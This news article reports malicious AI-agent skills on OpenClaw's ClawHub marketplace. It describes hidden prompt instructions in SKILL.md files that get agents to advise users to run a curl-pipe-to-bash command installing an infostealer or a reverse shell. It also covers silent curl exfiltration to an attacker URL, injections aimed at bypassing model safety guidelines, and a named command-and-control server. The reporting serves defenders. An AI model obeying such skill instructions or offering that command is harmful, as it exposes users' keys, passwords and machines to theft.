Categories: Cyber Security News

OpenClaw’s Top Skill is a Malware that Stole SSH Keys, and Opened Reverse Shells in 1,184 Packages

The most downloaded AI agent skill on OpenClaw’s ClawHub marketplace was functional malware, not a productivity tool.

OpenClaw, an open-source AI agent platform, operates a public skill marketplace called ClawHub, where third-party developers can publish plugins, or “skills,” that extend an agent’s capabilities.

Security researcher @chiefofautism has identified 1,184 malicious skills on OpenClaw’s ClawHub marketplace, with a single threat actor responsible for uploading 677 packages alone, exposing a catastrophic supply chain vulnerability at the heart of the AI agent ecosystem.

The problem: ClawHub allowed anyone to publish with nothing more than a one-week-old GitHub account as verification. Attackers exploited this low barrier to flood the registry with malicious skills disguised as crypto trading bots, YouTube summarizers, and wallet trackers — all with professionally written documentation designed to appear legitimate.

Hidden inside the SKILL.md files were AI prompt instructions engineered to trick the agent into advising users to run commands like:

curl -sL malware_link | bash

On macOS, that single command deployed Atomic Stealer (AMOS), a commodity infostealer that grabbed browser passwords, SSH keys, Telegram sessions, crypto wallet keys, keychain data, and every API key stored in .env files. On other systems, the malware opened a reverse shell, granting the attacker full remote control of the victim’s machine.

Cisco’s AI Defense team ran their Skill Scanner against the top-ranked community skill on ClawHub, a skill called “What Would Elon Do?” that had been artificially gamed to reach the #1 spot. The scan returned 9 security vulnerabilities: 2 Critical, 5 High, and 2 Medium.

The skill silently exfiltrated user data via a curl command to an attacker-controlled server (https://clawbub-skill.com/log), running with output redirected to /dev/null to avoid detection. It also embedded prompt injection payloads to bypass Claude’s safety guidelines — all while being downloaded thousands of times.vallettasoftware+1

https://twitter.com/chiefofautism/status/2024483631067021348?ref_src=twsrc%5Etfw

This crisis did not emerge overnight. Koi Security had previously audited 2,857 ClawHub skills and found 341 malicious entries, nearly 12% of the entire registry, with 335 linked to a single coordinated campaign codenamed ClawHavoc.

Snyk’s separate audit also identified 341 malicious skills, and a single publisher, “hightower6eu,” uploaded over 314 malicious packages with nearly 7,000 downloads across those entries. All identified malicious skills shared a common command-and-control server at 91.92.242.30.

OpenClaw has since enlisted Google’s VirusTotal to scan all uploaded skills, categorizing them as benign, suspicious, or malicious — with daily re-scans to catch skills that may mutate post-approval.

This is the AI-era equivalent of npm supply chain attacks, with one critical difference: the malicious package operates inside an AI agent with broad system permissions, file access, and the ability to execute terminal commands autonomously.

The attack surface is not a binary payload; it’s encoded in natural language instructions that traditional endpoint detection tools cannot parse or flag.

Organizations running OpenClaw in enterprise environments face a compounded “Shadow AI” risk, where agent-executed actions leave minimal audit trails and bypass conventional proxy-based monitoring.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post OpenClaw’s Top Skill is a Malware that Stole SSH Keys, and Opened Reverse Shells in 1,184 Packages appeared first on Cyber Security News.

rssfeeds-admin

Recent Posts

Brandon Sanderson Confirms a Connection Between Apple TV’s Murderbot and His Stormlight Archive Series

It's been a few months since Brandon Sanderson officially confirmed he'd be working with Apple…

1 hour ago

Save an Extra $400 Off the Compact 18-Liter Cooler Master NR2 RTX 5070 Miniature Gaming PC

Cooler Master's NR2 series PCs offer plenty of gaming prowess in a compact 18-liter chassis.…

1 hour ago

Nintendo Exclusives Are Dominating Amazon’s Best-Selling Video Games List

One of the biggest debates surrounding the Switch 2 has been whether the console has…

2 hours ago

Today’s Top Deals: Clair Obscur: Expedition 33, Xbox Gift Card, and Sonic Racing: CrossWorlds for Switch 2

A bunch of popular PC titles are discounted today, including our top game of 2025,…

2 hours ago

Subnautica 2 Lures In Nearly Half a Million Concurrent Players on Steam Within First Hour of Release

Subnautica 2 has hit almost half a million concurrent players on Steam in its first…

2 hours ago

TeamPCP and BreachForums Launch $1,000 Contest for Supply Chain Attacks

A cybercrime operation is turning software supply chain attacks into a public competition. TeamPCP, in…

2 hours ago

This website uses cookies.